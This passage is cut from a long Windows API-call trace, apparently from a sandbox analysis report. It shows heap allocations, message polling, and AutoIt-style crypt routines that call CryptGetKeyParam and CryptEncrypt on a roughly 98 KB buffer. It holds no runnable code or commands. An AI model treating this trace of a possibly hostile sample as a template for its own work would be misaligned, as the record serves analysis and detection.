Flags=0x0, Size=0x20) returned 0x8df028 [0177.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0177.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0177.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x17fea) returned 0xbea018 [0177.574] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0177.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0177.574] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0177.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0177.574] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0177.574] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0177.574] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0177.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0177.574] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0177.574] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0177.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0177.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0177.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0177.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0177.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0177.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0177.575] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0177.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0177.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0177.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0177.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0177.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0177.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0177.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0177.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0177.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0177.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0177.575] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0177.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0177.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0177.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0177.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0177.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0177.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0177.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0177.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0177.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0177.575] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0177.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0177.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0177.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0177.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0177.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0177.576] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.576] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0177.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0177.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0177.576] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0177.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0177.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0177.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0177.576] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2778, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2778*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0177.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0177.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0177.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0177.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0177.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0177.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0177.576] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0177.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0177.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0177.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0177.576] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0177.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0177.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0177.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0177.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0177.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0177.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0177.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0177.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0177.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0177.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0177.577] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0177.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0177.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0177.577] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0177.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0177.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0177.577] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.577] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.577] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0177.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0177.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0177.577] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0177.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0177.577] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0177.577] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0177.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0177.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0177.578] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.578] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0177.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0177.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.578] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.578] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0177.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0177.578] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0177.578] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0177.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0177.578] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0177.578] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0177.578] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0177.578] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0177.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0177.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0177.578] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.578] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0177.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0177.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0177.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0177.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0177.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0177.579] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.579] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0177.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0177.579] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0177.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0177.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0177.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0177.579] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x17fea, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x17ff0) returned 1 [0177.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0177.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0177.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0177.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0177.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0177.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0177.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0177.580] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0177.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0177.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0177.580] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.580] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0177.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0177.580] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0177.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0177.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0177.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0177.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0177.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0177.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0177.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0177.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.580] CharLowerBuffW (in: lpsz="byte[98289]", cchLength=0xb | out: lpsz="byte[98289]") returned 0xb [0177.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0177.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0177.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0177.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0177.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0177.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0177.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0177.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0177.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0177.581] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0177.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0177.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0177.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0177.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0177.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0177.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0177.584] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0177.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0177.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0177.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0177.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0177.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0177.585] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.585] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0177.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0177.587] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0177.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0177.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0177.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0177.587] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa8eff8*, pdwDataLen=0x87e820*=0x17fea, dwBufLen=0x17ff0 | out: pbData=0xa8eff8*, pdwDataLen=0x87e820*=0x17ff0) returned 1 [0177.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0177.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0177.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0177.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0177.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0177.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0177.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0177.589] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0177.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0177.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0177.589] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.589] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0177.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0177.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0177.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0177.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0177.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0177.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 